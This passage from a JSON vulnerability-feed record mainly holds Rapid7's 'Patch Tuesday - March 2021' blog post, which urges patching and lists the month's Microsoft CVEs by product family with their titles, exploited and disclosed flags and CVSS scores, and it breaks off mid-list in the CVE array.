"CVE-2021-34527", "CVE-2021-35449", "CVE-2021-36942", "CVE-2021-36958", "CVE-2021-38085"], "modified": "2021-08-12T17:13:25", "id": "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "href": "https://blog.rapid7.com/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-13T12:49:58", "description": "\n\nAnother Patch Tuesday ([2021-Mar](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Mar>)) is upon us and with this month comes a whopping 122 CVEs. As usual Windows tops the list of the most patched product. However, this month it\u2019s browser vulnerabilities taking the second place, outnumbering Office vulnerabilities 3:1! Lastly, the Exchange Server vulnerabilities this month are not to be ignored as more than half of them have been seen exploited in the wild.\n\n### Vulnerability Breakdown by Software Family\n\nFamily | Vulnerability Count \n---|--- \nWindows | 59 \nBrowser | 35 \nESU | 24 \nMicrosoft Office | 11 \nExchange Server | 7 \nDeveloper Tools | 6 \nAzure | 3 \nSQL Server | 1 \n \n## [Exchange Server Vulnerabilities](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b>)\n\nEarlier this month Microsoft [released out of band updates for Exchange Server](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>). These critical updates fixed a number of publicly exploited vulnerabilities, but not before attackers were able to compromise over 30,000 internet facing instances. \n\nYesterday, Microsoft issued an [additional set of patches](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>) for older, unsupported versions of Exchange Server. 
This gives customers who have not been able to update to the most recent version of Exchange the ability to defend against these widespread exploit attempts.\n\nIf you administer an Exchange Server, **stop reading this blog and go patch these systems!** For more information [please see our blog post on the topic](<https://blog.rapid7.com/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>).\n\n## Patch those Windows systems!\n\nAlmost half of the newly announced vulnerabilities this month affect components of Windows itself. Some major highlights include:\n\n * Multiple high-severity RCE vulnerabilities in Windows DNS Server \n([CVE-2021-26877](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26877>), [CVE-2021-26893](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26893>), [CVE-2021-26894](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26894>), [CVE-2021-26895](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26895>), and [CVE-2021-26897](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26897>))\n * Remote Code Execution in Hyper-V ([CVE-2021-26867](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26867>)) enabling virtual machine escape (CVSSv3 9.9)\n\n## Browser Vulnerabilities\n\nSince going end-of-life in November 2020, we haven't seen any Internet Explorer patches from Microsoft. However, this month Microsoft has made two new updates available: [CVE-2021-27085](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27085>) and [CVE-2021-26411](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26411>). CVE-2021-26411 has been exploited in the wild, so don't delay applying patches if IE is still in your environment.\n\nThe majority of the browser vulnerabilities announced this month affect Microsoft Edge on Chromium. 
These patches are courtesy of vulnerabilities being fixed upstream in the Chromium project.\n\n## Summary Tables\n\nHere are this month's patched vulnerabilities split by the product family.\n\n## Azure Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27075](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27075>) | Azure Virtual Machine Information Disclosure Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-27080](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27080>) | Azure Sphere Unsigned Code Execution Vulnerability | No | No | 9.3 | Yes \n[CVE-2021-27074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27074>) | Azure Sphere Unsigned Code Execution Vulnerability | No | No | 6.2 | Yes \n \n## Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27085](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27085>) | Internet Explorer Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-21190](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21190>) | Chromium CVE-2021-21190 : Uninitialized Use in PDFium | No | No | N/A | Yes \n[CVE-2021-21189](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21189>) | Chromium CVE-2021-21189: Insufficient policy enforcement in payments | No | No | N/A | Yes \n[CVE-2021-21188](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21188>) | Chromium CVE-2021-21188: Use after free in Blink | No | No | N/A | Yes \n[CVE-2021-21187](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21187>) | Chromium CVE-2021-21187: Insufficient data validation in URL formatting | No | No | N/A | Yes 
\n[CVE-2021-21186](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21186>) | Chromium CVE-2021-21186: Insufficient policy enforcement in QR scanning | No | No | N/A | Yes \n[CVE-2021-21185](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21185>) | Chromium CVE-2021-21185: Insufficient policy enforcement in extensions | No | No | N/A | Yes \n[CVE-2021-21184](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21184>) | Chromium CVE-2021-21184: Inappropriate implementation in performance APIs | No | No | N/A | Yes \n[CVE-2021-21183](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21183>) | Chromium CVE-2021-21183: Inappropriate implementation in performance APIs | No | No | N/A | Yes \n[CVE-2021-21182](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21182>) | Chromium CVE-2021-21182: Insufficient policy enforcement in navigations | No | No | N/A | Yes \n[CVE-2021-21181](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21181>) | Chromium CVE-2021-21181: Side-channel information leakage in autofill | No | No | N/A | Yes \n[CVE-2021-21180](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21180>) | Chromium CVE-2021-21180: Use after free in tab search | No | No | N/A | Yes \n[CVE-2021-21179](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21179>) | Chromium CVE-2021-21179: Use after free in Network Internals | No | No | N/A | Yes \n[CVE-2021-21178](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21178>) | Chromium CVE-2021-21178 : Inappropriate implementation in Compositing | No | No | N/A | Yes \n[CVE-2021-21177](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21177>) | Chromium CVE-2021-21177: Insufficient policy enforcement in Autofill | No | No | N/A | Yes 
\n[CVE-2021-21176](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21176>) | Chromium CVE-2021-21176: Inappropriate implementation in full screen mode | No | No | N/A | Yes \n[CVE-2021-21175](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21175>) | Chromium CVE-2021-21175: Inappropriate implementation in Site isolation | No | No | N/A | Yes \n[CVE-2021-21174](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21174>) | Chromium CVE-2021-21174: Inappropriate implementation in Referrer | No | No | N/A | Yes \n[CVE-2021-21173](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21173>) | Chromium CVE-2021-21173: Side-channel information leakage in Network Internals | No | No | N/A | Yes \n[CVE-2021-21172](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21172>) | Chromium CVE-2021-21172: Insufficient policy enforcement in File System API | No | No | N/A | Yes \n[CVE-2021-21171](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21171>) | Chromium CVE-2021-21171: Incorrect security UI in TabStrip and Navigation | No | No | N/A | Yes \n[CVE-2021-21170](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21170>) | Chromium CVE-2021-21170: Incorrect security UI in Loader | No | No | N/A | Yes \n[CVE-2021-21169](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21169>) | Chromium CVE-2021-21169: Out of bounds memory access in V8 | No | No | N/A | Yes \n[CVE-2021-21168](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21168>) | Chromium CVE-2021-21168: Insufficient policy enforcement in appcache | No | No | N/A | Yes \n[CVE-2021-21167](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21167>) | Chromium CVE-2021-21167: Use after free in bookmarks | No | No | N/A | Yes 
\n[CVE-2021-21166](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21166>) | Chromium CVE-2021-21166: Object lifecycle issue in audio | No | No | N/A | Yes \n[CVE-2021-21165](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21165>) | Chromium CVE-2021-21165: Object lifecycle issue in audio | No | No | N/A | Yes \n[CVE-2021-21164](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21164>) | Chromium CVE-2021-21164: Insufficient data validation in Chrome for iOS | No | No | N/A | Yes \n[CVE-2021-21163](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21163>) | Chromium CVE-2021-21163: Insufficient data validation in Reader Mode | No | No | N/A | Yes \n[CVE-2021-21162](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21162>) | Chromium CVE-2021-21162: Use after free in WebRTC | No | No | N/A | Yes \n[CVE-2021-21161](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21161>) | Chromium CVE-2021-21161: Heap buffer overflow in TabStrip | No | No | N/A | Yes \n[CVE-2021-21160](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21160>) | Chromium CVE-2021-21160: Heap buffer overflow in WebAudio | No | No | N/A | Yes \n[CVE-2021-21159](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21159>) | Chromium CVE-2021-21159: Heap buffer overflow in TabStrip | No | No | N/A | Yes \n[CVE-2020-27844](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-27844>) | Chromium CVE-2020-27844: Heap buffer overflow in OpenJPEG | No | No | N/A | Yes \n \n## Browser ESU Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26411](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26411>) | Internet Explorer Memory Corruption Vulnerability | Yes | Yes | 8.8 | Yes 
\n \n## Developer Tools Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27060](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27060>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-27084](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27084>) | Visual Studio Code Java Extension Pack Remote Code Execution Vulnerability | No | No | N/A | No \n[CVE-2021-27081](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27081>) | Visual Studio Code ESLint Extension Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-27083](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27083>) | Remote Development Extension for Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-27082](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27082>) | Quantum Development Kit for Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-21300](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21300>) | Git for Visual Studio Remote Code Execution Vulnerability | No | No | 8.8 | No \n \n## Exchange Server Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26412](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26412>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9.1 | No \n[CVE-2021-26855](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 9.1 | Yes \n[CVE-2021-27078](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27078>) | Microsoft Exchange Server Remote Code Execution 
Vulnerability | No | No | 9.1 | No \n[CVE-2021-26857](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26857>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n[CVE-2021-27065](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27065>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n[CVE-2021-26858](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26858>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n[CVE-2021-26854](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26854>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 6.6 | No \n \n## Microsoft Office Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27055](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27055>) | Microsoft Visio Security Feature Bypass Vulnerability | No | No | 7 | Yes \n[CVE-2021-24104](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24104>) | Microsoft SharePoint Spoofing Vulnerability | No | No | 4.6 | Yes \n[CVE-2021-27076](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27076>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-27052](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27052>) | Microsoft SharePoint Server Information Disclosure Vulnerability | No | No | 5.3 | Yes \n[CVE-2021-27056](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27056>) | Microsoft PowerPoint Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24108](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24108>) | Microsoft Office Remote Code Execution 
Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27057](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27057>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27059](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27059>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.6 | Yes \n[CVE-2021-27058](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27058>) | Microsoft Office ClickToRun Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27053](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27053>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27054](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27054>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## SQL Server Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26859](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26859>) | Microsoft Power BI Information Disclosure Vulnerability | No | No | 7.7 | Yes \n \n## Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26900](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26900>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26863](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26863>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-26871](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26871>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No 
\n[CVE-2021-26885](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26885>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26864](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26864>) | Windows Virtual Registry Provider Elevation of Privilege Vulnerability | No | No | 8.4 | No \n[CVE-2021-1729](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1729>) | Windows Update Stack Setup Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-26889](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26889>) | Windows Update Stack Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-26866](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26866>) | Windows Update Service Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-26870](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26870>) | Windows Projected File System Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26874](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26874>) | Windows Overlay Filter Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26879](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26879>) | Windows NAT Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-26884](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26884>) | Windows Media Photo Codec Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-26867](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26867>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 9.9 | Yes \n[CVE-2021-26868](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26868>) | Windows Graphics 
Component Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26892](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26892>) | Windows Extensible Firmware Interface Security Feature Bypass Vulnerability | No | No | 6.2 | No \n[CVE-2021-24090](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24090>) | Windows Error Reporting Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26865](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26865>) | Windows Container Execution Agent Elevation of Privilege Vulnerability | No | No | 8.8 | No \n[CVE-2021-26891](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26891>) | Windows Container Execution Agent Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26860](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26860>) | Windows App-V Overlay Filter Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-27066](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27066>) | Windows Admin Center Security Feature Bypass Vulnerability | No | No | 4.3 | No \n[CVE-2021-27070](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27070>) | Windows 10 Update Assistant Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2021-26886](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26886>) | User Profile Service Denial of Service Vulnerability | No | No | 5.5 | No \n[CVE-2021-26880](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26880>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26876](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26876>) | OpenType Font Parsing Remote Code Execution Vulnerability | No | No | 8.8 | No 
\n[CVE-2021-24089](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24089>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-26902](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26902>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27061](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27061>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24110](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24110>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27047](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27047>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27048](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27048>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27049](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27049>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27050](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27050>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27051](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27051>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27062](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27062>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24095](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24095>) | DirectX Elevation of Privilege 
Vulnerability | No | No | 7 | No \n[CVE-2021-26890](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26890>) | Application Virtualization Remote Code Execution Vulnerability | No | No | 7.8 | No \n \n## Windows ESU Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27077>) | Windows Win32k Elevation of Privilege Vulnerability | No | Yes | 7.8 | No \n[CVE-2021-26875](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26875>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26873](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26873>) | Windows User Profile Service Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-26899](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26899>) | Windows UPnP Device Host Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1640](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1640>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-26878](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26878>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26862](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26862>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 6.3 | No \n[CVE-2021-26861](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26861>) | Windows Graphics Component Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-24107](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24107>) | Windows Event Tracing Information Disclosure Vulnerability 
| No | No | 5.5 | Yes \n[CVE-2021-26872](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26872>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26898>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26901](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26901>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26897](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26897>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26877](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26877>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26893](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26893>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26894](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26894>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26895](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26895>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26896](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26896>) | Windows DNS Server Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-27063](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27063>) | Windows DNS Server Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-26869](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26869>) | Windows ActiveX Installer Service 
Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-26882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26882>) | Remote Access API Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26881](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26881>) | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.5 | No \n[CVE-2021-26887](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26887>) | Microsoft Windows Folder Redirection Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n \n## Summary Graphs\n\n", "cvss3": {}, "published": "2021-03-09T22:13:03", "type": "rapid7blog", "title": "Patch Tuesday - March 2021", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-27844", "CVE-2021-1640", "CVE-2021-1729", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190", "CVE-2021-21300", "CVE-2021-24089", "CVE-2021-24090", "CVE-2021-24095", "CVE-2021-24104", "CVE-2021-24107", "CVE-2021-24108", "CVE-2021-24110", "CVE-2021-26411", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26859", "CVE-2021-26860", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26863", "CVE-2021-26864", "CVE-2021-26865", "CVE-2021-26866", "CVE-2021-26867", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26870", "CVE-2021-26871", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26874", 
